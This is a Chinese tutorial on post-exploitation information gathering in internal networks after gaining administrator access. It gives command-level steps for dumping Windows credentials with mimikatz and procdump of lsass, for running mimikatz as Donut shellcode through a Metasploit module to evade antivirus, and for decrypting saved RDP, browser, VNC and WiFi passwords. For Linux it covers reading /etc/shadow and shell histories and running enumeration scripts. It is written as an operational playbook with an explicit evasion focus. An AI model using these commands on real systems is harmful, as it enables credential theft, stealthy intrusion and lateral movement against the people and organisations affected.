当前位置:   article > 正文

内网渗透之内网主机信息收集_netpass

netpass

目录

Windows信息收集

Windows账号密码

明文抓取

Mimikatz 离线读取Hash和密码明文

MSF加载bin抓取密码(VT查杀率2/59)

 LaZagne

RDP登录凭据

mimikatz抓取

 NetPass抓取

PowerShell脚本抓取 

浏览器账号密码

Google Chrome

QQ浏览器

MSF模块利用

其他软件账号密码

Navicat

 SecureCRT

Xshell

 WinSCP

VNC

VPN账号密码

WIFI账号密码

web服务配置路径

IIS

Tomcat

Apache

Nginx

wdcp

其他信息收集

Linux系统信息收集

系统信息

Web应用服务

数据库

关于Linux系统下的自动化信息收集脚本

1.LinPEAS

2.LinEnum

3.Bashark


在我们成功进入了内网渗透的阶段后,拿到了主机的管理员权限,接下来就是要收集内网中主机的各种信息,以便于我们进行后续的横向移动等扩大我们战果的操作。

Windows信息收集

在获取了Windows系统权限(通常是管理员权限)后,我们就需要尽可能多的收集这台机器上的各种信息,各种密码,各种敏感文件和资料了。如下是收集信息的一些命令:


Windows账号密码

在我们拿到了管理员的权限后,首先要做的就是获得Windows主机的登录密码。最主流的获取windows 密码的方法最主流的方法有三种,mimikatz 直接执行获取;procdump + mimikatz 进行获取;读取注册表进行获取 + mimikatz 解密进行获取。
使用这三种方式的前提是必须在管理员的权限下进行执行命令,不然执行会失败。

不过一般而言,直接上传mimikatz到主机上抓取密码一般都是不行的,毕竟各大杀毒软件厂商都把mimikatz盯得死死的,而且微软的Windows sever12之后就不再支持抓取明文密码了。所以一般的抓取密码方式肯定是行不通的。

所以我这边就列举一些能躲避杀毒软件的mimikatz的抓取密码的方式。

明文抓取

注意:运行前必须有管理员权限

在这些情况下我们无法获取明文密码

Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码
Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码
Windows系统LM Hash及NTLM Hash加密算法,个人系统在windows vista后,服务器系统在windows2003以后,认证方式均为NTLM Hash
此时可以进行注册表修改,这样就可以抓取明文密码了,不过实战环境中来说一般不太可能进行类似的操作。

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

直接将mimikatz 上传到目标服务器,执行相关命令。

  1. mimikatz # privilege::debug
  2. Privilege '20' OK
  3. mimikatz # sekurlsa::logonpasswords

Mimikatz 离线读取Hash和密码明文

思路就是通过系统自带的procdump去下载存储用户名密码的文件,然后用mimikatz读取。

Procdump是一个轻量级的Sysinternal团队开发的命令行工具, 它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因. 你还可以把它作为生成dump的工具使用在其他的脚本中.

Procdump是微软官方自带的软件,所以一般不会被系统查杀

Procdump工具导出 lsass.dmp文件

procdump64.exe -accepteula  -ma lsass.exe lsass.dmp

注意:生成的文件的后缀,可能会产生lsass.dump.dmp的文件,注意将后缀删除

然后将lsass.dump文件上传到本地主机,利用mimikatz进行解密。

mimikatz读取 lsass.dmp中Hash和密码

mimikatz.exe "sekurlsa::minidump C:\lsass.dump" "sekurlsa::logonPasswords full" "exit"

Procdump下载地址:ProcDump - Sysinternals | Microsoft Learn

注:在virustotal.com上procdump.exe查杀率为0/72,不过这种读取lsass的行为早就被各大杀软拦截了,所以这种静态查杀没有太大参考价值。

说了这么多,总不能都是写漏洞百出的躲避杀软的方法吧,那么就给大家来点干货。

MSF加载bin抓取密码(VT查杀率2/59)

Donut下载:GitHub - TheWover/donut: Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters

shellcode_inject.rb代码下载BypassAntiVirus/tools/mimikatz at master · TideSec/BypassAntiVirus · GitHub

1、首先使用Donut对需要执行的文件进行shellcode生成,这里对mimi进行shellcode生成,生成bin文件,等下会用到。

donut.exe -f mimikatz.exe -a 2 -o mimi.bin #生成mimi.bin文件

2、将上面的shellcode_inject.rb放入/opt/metasploit-framework/embedded/framework/modules/post/windows/manage下(实际路径可能不同,也就是metasploit-framework的上级路径,根据实际情况调整),然后进入msf,reload_all同时载入所有模块。(当然这一切都要在MSF获得了一个session会话后进行)。

kali里是在目录/usr/share/metasploit-framework/modules/post/windows/manage/

mac下是在/opt/metasploit-framework/embedded/framework/modules/post/windows/manage

 

 使用之前载入的shellcode_inject注入模块,这里是获取session后的操作了,session先自己上线再进行以下操作。

  1. use post/windows/manage/shellcode_inject
  2. set session 1
  3. set shellcode /tmp/mini.bin
  4. run

最后成功加载了mimi,使用shellcode注入执行,有更强的隐蔽性。

 注:这里只是写了关于躲避杀软方面的一小部分知识,更多躲避杀软的方式请关注BypassAntiVirus: 远控免杀系列文章及配套工具,汇总测试了互联网上的几十种免杀工具、113种白名单免杀方式、8种代码编译免杀、若干免杀实战技术,并对免杀效果进行了一一测试,为远控的免杀和杀软对抗免杀提供参考。

 系列文章。

 LaZagne

这里在提一个支持Windows,Linux,mac等环境抓取密码或者其它浏览器等密码的工具。GitHub - AlessandroZ/LaZagne: Credentials recovery project

不过被各大杀毒软件厂商盯得死死的,就请师傅们自己尝试免杀的方法吧

使用方法:

  1. laZagne.exe all #启用所有模块
  2. laZagne.exe browsers #启用browsers模块
  3. laZagne.exe all -w 1.txt #将导出的密码写入1.txt文件

RDP登录凭据

当我们拿到了机器的管理员权限后,想获取其RDP的凭据。那么,该如何操作呢?

mimikatz抓取

首先,执行以下命令查看目标机器是否存在RDP凭据

  1. cmdkey /list #查看mstsc的连接纪录
  2. dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* #查找本地的Credentials

 存在的话,上传mimikatz,执行以下命令,记录 guidMasterKey 值

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\19DC8328D3873E6AB8EF6B081B771D2E"

 执行以下值,找到 guidMasterKey 值 对应的 MasterKey。上面的guidMasterKey在这里是GUID

mimikatz.exe "privilege::debug" "sekurlsa::dpapi"

 

 执行以下命令,使用上面记录的MasterKey破解指定的凭据:19DC8328D3873E6AB8EF6B081B771D2E

mimikatz.exe "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\19DC8328D3873E6AB8EF6B081B771D2E /masterkey:cf8ba397fe285a877997100a3b3fe3259821fe4cb7a47bd9dc8887296a4ff7914a2a3b04a5b8a96d4ce418937604e0a23799f990abb537a599130fce394eb114"

 如图,破解出密码明文。

 NetPass抓取

工具下载地址:Recover lost Windows 10/7/8/Vista/XP network passwords (Credentials file)

如果直接远程桌面登上去的话,可以使用 netpass.exe 工具直接查看

 

PowerShell脚本抓取 

下载地址:https://github.com/peewpw/Invoke-WCMDump

执行以下代码

  1. Import-Module .\Invoke-WCMDump.ps1
  2. Invoke-WCMDump

 也使用CS导入powershell脚本执行,但是会被报毒

 注:文中部分内容转载自获取RDP登录凭据_谢公子的博客-CSDN博客

浏览器账号密码

Google Chrome

chrome浏览器默认的用户数据保存目录如下:

用户数据目录:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\      
缓存目录:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Cache\       
各文件如下:      
    书签:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Bookmarks      
    Cookie: C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Cookies      
    浏览历史:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\History      
    当前的session:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Current Session      
    账号密码:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Login Data      
             C:\Users\xx\AppData\Local\Google\Chrome\User Data\Profile\Login Data

QQ浏览器

QQ浏览器默认的用户数据保存目录如下:

用户数据目录:C:\Users\xx\AppData\Local\Tencent\QQBrowser\User Data\Default      
缓存目录:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Cache\       
各文件如下:      
    书签:C:\Users\xx\AppData\Local\Tencent\QQBrowser\User Data\Default\Bookmarks      
    Cookie: C:\Users\xx\AppData\Local\Tencent\QQBrowser\User Data\Default\Cookies      
    浏览历史:C:\Users\xx\AppData\Local\Tencent\QQBrowser\User Data\Default\History      
    当前的session:C:\Users\xx\AppData\Local\Tencent\QQBrowser\User Data\Default\Current Session      
    账号密码:C:\Users\xx\AppData\Local\Tencent\QQBrowser\User Data\Default\Login Data

360安全浏览器

360浏览器默认的用户数据保存目录如下:

账号密码文件:C:\Users\xx\AppData\Roaming\360se6\User Data\Default\apps\LoginAssis\assis2.db

MSF模块利用

MSF模块中也有抓取浏览器账户密码的模块,当然是在获得了一个seesion会话的前提条件下,执行以下代码。

  1. use post/multi/gather/lastpass_creds
  2. set payload windows/meterpreter/reverse_tcp
  3. set lhost 0.0.0.0
  4. set session 1
  5. exploit

其他软件账号密码

“Navicat”是一套可创建多个连接的数据库管理工具,用以方便管理 MySQLOraclePostgreSQLSQLiteSQL ServerMariaDBMongoDB 等不同类型的数据库,它与阿里云腾讯云华为云、Amazon RDS、Amazon Aurora、Amazon Redshift、Microsoft Azure、Oracle Cloud 和 MongoDB Atlas等云数据库兼容。你可以创建、管理和维护数据库。Navicat 的功能足以满足专业开发人员的所有需求,但是对数据库服务器初学者来说又简单易操作。Navicat 的用户界面 (GUI) 设计良好,让你以安全且简单的方法创建、组织、访问和共享信息。

<table cellpadding="0" cellspacing="0"><tbody><tr><td style="vertical-align:top;"><p>MySQL</p></td><td style="vertical-align:top;"><p>HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\&lt;your &nbsp;connection name&gt;</p></td></tr><tr><td style="vertical-align:top;"><p>MariaDB</p></td><td style="vertical-align:top;"><p>HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\&lt;your &nbsp;connection name&gt;</p></td></tr><tr><td style="vertical-align:top;"><p>MongoDB</p></td><td style="vertical-align:top;"><p>HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMONGODB\Servers\&lt;your &nbsp;connection name&gt;</p></td></tr><tr><td style="vertical-align:top;"><p>Microsoft &nbsp;SQL</p></td><td style="vertical-align:top;"><p>HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\&lt;your &nbsp;connection name&gt;</p></td></tr><tr><td style="vertical-align:top;"><p>Oracle</p></td><td style="vertical-align:top;"><p>HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\&lt;your &nbsp;connection name&gt;</p></td></tr><tr><td style="vertical-align:top;"><p>PostgreSQL</p></td><td style="vertical-align:top;"><p>HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\&lt;your &nbsp;connection name&gt;</p></td></tr><tr><td style="vertical-align:top;"><p>SQLite</p></td><td style="vertical-align:top;"><p>HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\&lt;your &nbsp;connection name&gt;</p></td></tr></tbody></table>

 SecureCRT

SecureCRT 是一款用于连接运行包括Windows、UNIX和VMS的远程系统的理想工具,通过使用内含的VCP命令行程序可以进行加密文件的传输。

<table cellpadding="0" cellspacing="0"><tbody><tr><td style="vertical-align:top;"><p>xp/win2003</p></td><td style="vertical-align:top;"><p>C:\Documents &nbsp;&nbsp;and Settings\USERNAME\Application Data\VanDyke\Config\Sessions</p><p></p></td></tr><tr><td style="vertical-align:top;"><p>win7/win2008以上</p></td><td style="vertical-align:top;"><p>C:\Users\USERNAME\AppData\Roaming\VanDyke\Config\Sessions</p></td></tr></tbody></table>

Xshell

Xshell 是一个强大的安全终端模拟软件,它支持SSH1, SSH2, 以及Microsoft Windows 平台的TELNET 协议。Xshell 通过互联网到远程主机的安全连接以及它创新性的设计和特色帮助用户在复杂的网络环境中享受他们的工作。

<table cellpadding="0" cellspacing="0"><tbody><tr><td style="vertical-align:top;"><p>Xshell 5</p></td><td style="vertical-align:top;"><p>%userprofile%\Documents\NetSarang\Xshell\Sessions</p></td></tr><tr><td style="vertical-align:top;"><p>Xshell 6</p></td><td style="vertical-align:top;"><p>%userprofile%\Documents\NetSarang &nbsp;Computer\6\Xshell\Sessions</p></td></tr></tbody></table>

 WinSCP

WinSCP是一个Windows环境下使用SSH的开源图形化SFTP客户端。同时支持SCP协议。它的主要功能就是在本地与远程计算机间安全的复制文件。.winscp也可以链接其他系统,比如linux系统。

<table cellpadding="0" cellspacing="0"><tbody><tr><td style="vertical-align:top;"><p>HKCU\Software\Martin &nbsp;Prikryl\WinSCP 2\Sessions</p></td></tr></tbody></table>

VNC

VNC  (Virtual Network Console)是虚拟网络控制台的缩写。它 是一款优秀的远程控制工具软件,由著名的 AT&T 的欧洲研究实验室开发的。VNC 是在基于 UNIXLinux 操作系统的免费的开源软件,远程控制能力强大,高效实用,其性能可以和 Windows 和 MAC 中的任何远程控制软件媲美。 在 Linux 中,VNC 包括以下四个命令:vncserver,vncviewer,vncpasswd,和 vncconnect。大多数情况下用户只需要其中的两个命令:vncserver 和 vncviewer。

<table cellpadding="0" cellspacing="0"><tbody><tr><td style="vertical-align:top;"><p>RealVNC</p></td><td style="vertical-align:top;"><p>HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver</p></td><td style="vertical-align:top;"><p>Password</p></td></tr><tr><td style="vertical-align:top;"><p>TightVNC</p></td><td style="vertical-align:top;"><p>HKEY_CURRENT_USER\Software\TightVNC\Server &nbsp;Value</p></td><td style="vertical-align:top;"><p>Password &nbsp;or PasswordViewOnly</p></td></tr><tr><td style="vertical-align:top;"><p>TigerVNC</p></td><td style="vertical-align:top;"><p>HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4</p></td><td style="vertical-align:top;"><p>Password</p><p></p></td></tr><tr><td style="vertical-align:top;"><p>UltraVNC</p></td><td style="vertical-align:top;"><p>C:\Program &nbsp;Files\UltraVNC\ultravnc.ini</p></td><td style="vertical-align:top;"><p>passwd or &nbsp;passwd2</p></td></tr></tbody></table>

VPN账号密码

mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

也可以使用图形化命令工具 Dialupass.exe

WIFI账号密码

  1. #查看帮助
  2. netsh wlan help
  3. #列出无线接口
  4. netsh wlan show interface
  5. #开启无线接口
  6. netsh interface set interface "Interface Name" enabled
  7. #显示连接过的WIFI的配置文件
  8. netsh wlan show profiles
  9. #连接指定wifi
  10. netsh wlan connect name=xxxx
  11. #断开连接
  12. netsh wlan disconnect
  13. #查看连接过的WIFI的配置文件(包含账号密码),需要管理员权限执行
  14. netsh wlan export profile interface=WLAN key=clear folder=C:\
  15. #然后使用type命令查看配置文件
  16. type C:\xxx.xml
  17. #批量显示wifi账号密码
  18. for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
  19. 其它常用的命令:
  20. 导出配置文件:netsh wlan export profile key=clear
  21. 删除配置文件:netsh wlan delete profile name=""
  22. 添加配置文件:netsh wlan add profile filename=""

一条命令导出电脑中所有WiFi账户密码,不需要管理员权限。

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do  @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear #cmd直接执行,不需要管理员权限

web服务配置路径

IIS

  1. IIS6
  2. cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/root
  3. IIS7、IIS8
  4. 列出网站列表:appcmd.exe %systemroot%/system32/inetsrv/appcmd.exe list site
  5. 列出网站物理路径:appcmd.exe %systemroot%\system32\inetsrv\appcmd.exe list vdir
  6. 或者使用mimikatz读取IIS7配置文件:
  7. mimikatz.exe privilege::debug log "iis::apphost /in:"%systemroot%\system32\inetsrv\config\applicationHost.config" /live" exit

Tomcat

  1. /conf/tomcat-users.xml
  2. /conf/server.xml
  3. /conf/web.xml

Apache

/etc/httpd/conf/httpd.conf

Nginx

/etc/nginx/nginx.conf

wdcp

/www/wdlinux/wdcp/conf/mrpw.conf

其他信息收集

  1. 系统
  2. systeminfo #查看系统信息
  3. net config workstation #简单查看系统信息
  4. systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #查看系统及版本,英文系统
  5. systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" #查看系统及版本,中文系统
  6. echo %PROCESSOR_ARCHITECTURE% #查看系统架构,一般为AMD64
  7. set #查看系统环境变量
  8. wmic qfe get Caption,Description,HotFixID,InstalledOn #查看系统补丁信息
  9. wmic bios #查看bios信息
  10. nbtstat -A ip #netbios查询
  11. fsutil fsinfo drives #查看所有的盘符
  12. gpupdate /force #更新计算机策略
  13. 安装的软件版本信息
  14. wmic product get name,version #查看安装的软件及版本
  15. powershell "get-wmiobject -class Win32_product | select-Object -property name,version" #查看安装的软件及版本 1
  16. 网络
  17. ipconfig /all #查看ip详细信息
  18. ipconfig /displaydns #查看DNS缓存
  19. route print #查看路由
  20. arp -a #查看arp缓存表
  21. net view #查询机器列表
  22. type C:\Windows\System32\drivers\etc\hosts #查看hosts文件
  23. 用户账号密码
  24. whoami /all #查询当前用户权限等
  25. net user #只显示本机的用户,不显示域用户
  26. net user xie #查看用户xie的具体信息
  27. wmic useraccount get /ALL #查看本机用户详细信息
  28. net localgroup #查看组
  29. net localgroup administrators #显示本机的administrators管理员组。除了显示本机中用户,还会显示域用户(前提是该域用户在本机的Administrators组内)
  30. query user 或 quser #查询当前在线用户
  31. qwinsta #查询当前在线用户
  32. qwinsta /SERVER:IP #查看远程登录情况
  33. query session #查询会话
  34. query termserver #查询远程桌面主机列表
  35. net accounts #查看本地密码策略
  36. 端口
  37. netstat -ano #查看端口开放情况、
  38. netstat -ano|findstr 80 #查看80端口对应的PID
  39. 查看回收站内容
  40. SharpCheckInfo.exe -GetRecycle
  41. 服务
  42. net start #查询当前运行的服务
  43. wmic service list brief #查看服务name、进程ID、状态等
  44. 进程
  45. tasklist #查看进程列表
  46. tasklist /svc #查看进程,显示进程使用者名称
  47. tasklist | findstr 80 #查看80端口对应的进程
  48. taskkill /f /t /im xx.exe #杀死xx.exe进程
  49. taskkill /F -pid 520 #杀死pid为520的进程
  50. wmic process list brief #查看进程
  51. 共享
  52. net use #查看连接
  53. net share #查看共享
  54. wmic share get name,path,status #查看共享信息
  55. net session #查看会话
  56. net view \ip #查询指定IP共享
  57. 启动程序信息
  58. wmic startup get command,caption #查看启动项信息
  59. 计划任务
  60. schtasks /query /fo LIST /v #查看计划任务
  61. 开机时间
  62. net statistics workstation #查看机器开机时间
  63. 查询IE浏览器的代理信息
  64. reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
  65. 查询RDP端口号
  66. reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /V portNumber
  67. cmd和powershell的当前窗口历史命令(注,只限于powershellv3以下)
  68. Get-History | Format-List -Property * # 查询 powershell 当前窗口历史操作记录
  69. Clear-History # 删除 powershell 当前窗口历史操作记录
  70. Clear-History -Id 3 # 删除 powershell 当前窗口指定 ID 的历史操作记录
  71. doskey /h # 查看 cmd 的历史操作记录
  72. doskey /reinstall # 删除 cmd 的历史操作记录
  73. # powershell v3、v4 版本需要安装Get-PSReadlineOption
  74. msiexec /q /i PackageManagement_x64.msi
  75. # 查看 powershellv5 历史操作记录
  76. type %appdata%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Linux系统信息收集

系统信息

  1. hostname 或 uname -n #主机名
  2. history #查看命令历史,有可能可以查看到管理员的一些重要命令,包括密码等
  3. uname -a #所有版本
  4. uname -r #内核版本信息
  5. uname -m #Linux内核架构
  6. cat /proc/version #内核信息
  7. cat /proc/cpuinfo #CPU信息
  8. cat /etc/*-release #发布信息
  9. cat /etc/issue #发布信息
  10. #用户和组信息
  11. whoami #查看当前用户身份
  12. who #查看当前登录系统的所有用户
  13. w #显示已经登陆系统的用户列表,并显示用户正在执行的指令
  14. users #显示当前登录系统的所有用户的用户列表
  15. id #当前用户信息
  16. id || (whoami && groups) 2>/dev/null #当前用户信息
  17. cat /etc/passwd | cut -d: -f1 #查看所有的用户名
  18. cat /etc/passwd | grep "sh$" #查看拥有bash的用户
  19. awk '/\$1|\$6/{print $1}' /etc/shadow #查看可以远程登录的用户
  20. cat /etc/shadow #查看密码
  21. cat /etc/group #查看组信息
  22. last #查看登录历史
  23. more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)" #查看拥有sudo权限的用户
  24. sudo -l #列出目前用户可执行与无法执行的指令
  25. awk -F: '$3==0{print $1}' /etc/passwd #查看超级用户(uid=0),有些黑客将普通用户的uid改为0,则该普通用户也拥有了超级权限
  26. #登录信息
  27. last #查看最近登录成功的用户及信息,查看的是 /var/log/wtmp 文件
  28. lastb #查看最近登录失败的用户及信息,查看的是 /var/log/btmp 文件
  29. lastlog #显示系统中所有用户最近一次登录信息,读取的是 /var/log/lastlog 文件
  30. cat /var/log/secure* | grep Accepted #查看登录成功的记录
  31. cat /var/log/secure* | grep Failed #查看登录失败的记录
  32. grep "Accepted " /var/log/secure* | awk '{print $1,$2,$3,$9,$11}' #查看登录成功的日期、用户名及ip
  33. grep "Failed password for root" /var/log/secure | awk '{print $11}' #查看有哪些ip在爆破主机的root账号
  34. grep "Failed password" /var/log/secure | awk {'print $9'} | sort | uniq -c | sort -nr #查看爆破用户名字典
  35. #网络信息
  36. ifconfig
  37. arp -a
  38. cat /etc/network/interfaces #查看网络接口信息
  39. route #查看路由信息
  40. traceroute baidu.com #查看路由节点
  41. cat /etc/hosts #查看hosts文件
  42. cat /etc/resolv.conf #查看dns信息
  43. cat /etc/services #查看端口服务映射
  44. #服务、端口和进程信息
  45. ps aux / ps -ef #静态查看进程
  46. pstree #查看进程树
  47. top #动态查看进程
  48. ps aux --sort -pcpu #静态查看进程,根据cpu使用情况排行,从高到低
  49. ps aux --sort -pmem #静态查看进程,根据内存使用情况排行,从高到低
  50. netstat -pantu #查看端口信息
  51. netstat -pantu | grep 18176 #查看端口连接情况,过滤含有18176端口的行,就可以查看连接的端口
  52. cat /etc/inetd.conf #由inetd管理的服务列表
  53. cat /etc/xinetd.conf #由xinetd管理的服务列表
  54. cat /etc/exports #nfs服务器的配置
  55. cat /etc/services #查看端口服务映射
  56. ls -l /proc/18176/exe #查看PID为18176的进程的可执行程序
  57. lsof -p 18176 #查看PID为18176的进程打开的文件
  58. lsof -c sshd #查看进程sshd打开的文件
  59. lsof -i:33946 #查看33946端口对应的一些进程
  60. ps -p PID -o lstart #查看进程的启动时间点
  61. fuser -n tcp 33946 #查看33946端口对应的进程PID
  62. #环境信息
  63. env #打印系统环境信息
  64. set #打印系统环境信息
  65. echo $PATH #环境变量中的路径信息
  66. history #历史命令
  67. cat /etc/profile #显示默认系统遍历
  68. cat /etc/shells #显示可用的shell

内核,操作系统和设备信息

  1. uname -a 打印所有可用的系统信息
  2. uname -r 内核版本
  3. uname -n 系统主机名。
  4. uname -m 查看系统内核架构(64/32位)
  5. hostname 系统主机名
  6. lsb_release -a 发行版信息
  7. cat /proc/version 内核信息
  8. cat /etc/*-release 发行版信息
  9. cat /etc/issue 发行版信息
  10. cat /proc/cpuinfo CPU信息

用户和群组

  1. cat /etc/passwd 列出系统上的所有用户
  2. cat /etc/shadow 查看用户Hash
  3. cat /etc/group 列出系统上的所有组
  4. groups 当前用户所在的组
  5. groups test test用户所在的组
  6. getent group xxx xxx组里的用户
  7. grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' 列出所有的超级用户账户
  8. awk -F: 'length($2)==0 {print $1}' /etc/shadow #查看是否存在空口令用户
  9. awk '/\$1|\$6/{print $1}' /etc/shadow #查看远程登录的账号
  10. whoami 查看当前用户
  11. w 谁目前已登录,他们正在做什么
  12. who 命令用于显示系统中有哪些使用者正在上面
  13. last 最后登录用户的列表
  14. lastlog 所有用户上次登录的信息
  15. lastlog –u %username% 有关指定用户上次登录的信息

用户和权限信息

  1. whoami 当前用户名
  2. id 当前用户信息
  3. cat /etc/sudoers 可以使用sudo提升到root的用户
  4. sudo -l 查看那些用户当前可以以root身份执行的操作

环境信息

  1. env 显示所有的环境变量
  2. set 显示本地环境变量
  3. echo $PATH 环境变量中的路径信息
  4. export [-fnp][变量名称]=[变量设置值] 显示和设置环境变量
  5. pwd 输出工作目录
  6. cat /etc/profile 显示默认系统变量
  7. cat /etc/shells 显示可用的shell
  8. ls -la /etc/*.conf 查看etc下所有配置文件

历史命令

  1. history
  2. cat ~/.bash_history
  3. # 查看其他用户的历史命令文件
  4. cat /home/user/.bash_history

Web应用服务

常见配置文件路径:

  1. /apache/apache/conf/httpd.conf
  2. /apache/apache2/conf/httpd.conf
  3. /apache/php/php.ini
  4. /bin/php.ini
  5. /etc/apache/apache.conf
  6. /etc/apache/httpd.conf
  7. /etc/apache2/apache.conf
  8. /etc/apache2/httpd.conf
  9. /etc/apache2/sites-available/default
  10. /etc/apache2/vhosts.d/00_default_vhost.conf
  11. /etc/httpd/conf.d/httpd.conf
  12. /etc/httpd/conf.d/php.conf
  13. /etc/httpd/conf/httpd.conf
  14. /etc/httpd/php.ini
  15. /etc/init.d/httpd
  16. /etc/php.ini
  17. /etc/php/apache/php.ini
  18. /etc/php/apache2/php.ini
  19. /etc/php/cgi/php.ini
  20. /etc/php/php.ini
  21. /etc/php/php4/php.ini
  22. /etc/php4.4/fcgi/php.ini
  23. /etc/php4/apache/php.ini
  24. /etc/php4/apache2/php.ini
  25. /etc/php4/cgi/php.ini
  26. /etc/php5/apache/php.ini
  27. /etc/php5/apache2/php.ini
  28. /etc/php5/cgi/php.ini
  29. /etc/phpmyadmin/config.inc.php
  30. /home/apache/conf/httpd.conf
  31. /home/apache2/conf/httpd.conf
  32. /home/bin/stable/apache/php.ini
  33. /home2/bin/stable/apache/php.ini
  34. /NetServer/bin/stable/apache/php.ini
  35. /opt/www/conf/httpd.conf
  36. /opt/xampp/etc/php.ini
  37. /PHP/php.ini
  38. /php/php.ini
  39. /php4/php.ini
  40. /php5/php.ini
  41. /usr/lib/php.ini
  42. /etc/nginx/nginx.conf
  43. /usr/lib/php/php.ini
  44. /usr/local/apache/conf/httpd.conf
  45. /usr/local/apache/conf/php.ini
  46. /usr/local/apache2/conf/httpd.conf
  47. /usr/local/apache2/conf/php.ini
  48. /usr/local/etc/php.ini
  49. /usr/local/httpd/conf/httpd.conf
  50. /usr/local/lib/php.ini
  51. /usr/local/php/lib/php.ini
  52. /usr/local/php4/lib/php.ini
  53. /usr/local/php4/lib/php.ini
  54. /usr/local/php4/php.ini
  55. /usr/local/php5/etc/php.ini
  56. /usr/local/php5/lib/php.ini
  57. /usr/local/php5/php5.ini
  58. /usr/local/share/examples/php/php.ini
  59. /usr/local/share/examples/php4/php.ini
  60. /usr/local/Zend/etc/php.ini
  61. /var/apache2/config.inc
  62. /var/httpd/conf/httpd.conf
  63. /var/httpd/conf/php.ini
  64. /var/httpd/conf/php.ini
  65. /var/local/www/conf/httpd.conf
  66. /var/local/www/conf/php.ini
  67. /var/www/conf/httpd.conf
  68. /web/conf/php.ini
  69. /www/conf/httpd.conf
  70. /www/php/php.ini
  71. /www/php4/php.ini
  72. /www/php5/php.ini
  73. /xampp/apache/bin/php.ini
  74. /xampp/apache/conf/httpd.conf

数据库

  1. /etc/init.d/mysql
  2. /etc/my.cnf
  3. /etc/mysql/my.cnf
  4. /etc/mysql/my.cnf
  5. /var/lib/mysql/my.cnf
  6. /var/lib/mysql/mysql/user.MYD
  7. /usr/local/mysql/bin/mysql
  8. /usr/local/mysql/my.cnf
  9. /usr/share/mysql/my.cnf

关于Linux系统下的自动化信息收集脚本

说到信息收集,自然是离不开信息收集的脚本了,关于在Linux上执行信息收集的脚本有很多。我这里就列举几个著名的。

1.LinPEAS

GitHub链接:PEASS-ng/linPEAS at master · carlospolop/PEASS-ng · GitHub

它是由Carlos P创建的,目的是列举在Linux系统上提升特权的所有可能方法。关于LinPEAS的比较好的一点是它不需要其它依赖项。这使它能够运行现有二进制文件支持的任何内容。

LinPEAS支持Debian,CentOS,FreeBSD和OpenBSD。

LinPEAS不会将任何内容直接写入磁盘,并且在默认情况下运行时,它不会尝试通过su命令以其他用户身份登录。LinPEAS执行花费的时间从2分钟到10分钟不等,具体取决于请求的检查次数。

如果要在CTF比赛中运行LinPEAS,请尽量使用-a参数,它将激活所有检查。LinPEAS监视进程以查找非常频繁的cron任务,但是要执行此操作,您将需要添加-a参数,并且此检查将在文件中写入一些信息,该信息稍后将被删除,这使得我们执行完它不会留下痕迹。

  1. -s(超快和隐身):这将绕过一些耗时的检查,并且不会留下任何痕迹。
  2. -P(密码):传递将与sudo -l和Bruteforcing其他用户一起使用的密码
  3. -h帮助
  4. -o仅执行选定的检查
  5. -d <IP/NETMASK>使用fping或ping查找主机
  6. ip <端口> -d <IP/NETMASK>使用nc查找正在寻找TCP开放端口的主机

它在执行期间导出并取消设置一些环境变量,因此在会话期间执行的任何命令都不会保存在历史记录文件中,如果您不想使用此功能,只需在利用它时添加-n参数即可。

 

 更多方面自己测试,这里就不多说了。

2.LinEnum

GitHub链接:GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

它是由Rebootuser创建的。LinEnum是一个Shell脚本,其工作原理是从目标计算机中提取有关提升特权的信息。它支持实验报告功能,可以帮助以可读的报告格式导出扫描结果。一些参数,例如:

  1. -k 输入关键字
  2. -e 输入导出位置
  3. -t 包括详尽的测试
  4. -s 提供当前用户密码以检查sudo权限(不安全)
  5. -r 输入报告名称
  6. -h 显示帮助文本

渗透过程中只要将脚本文件上传到目标主机上运行即可。

执行以下代码运行。

./LinEnum.sh 

3.Bashark

GitHub链接:https://github.com/redcode-labs/Bashark

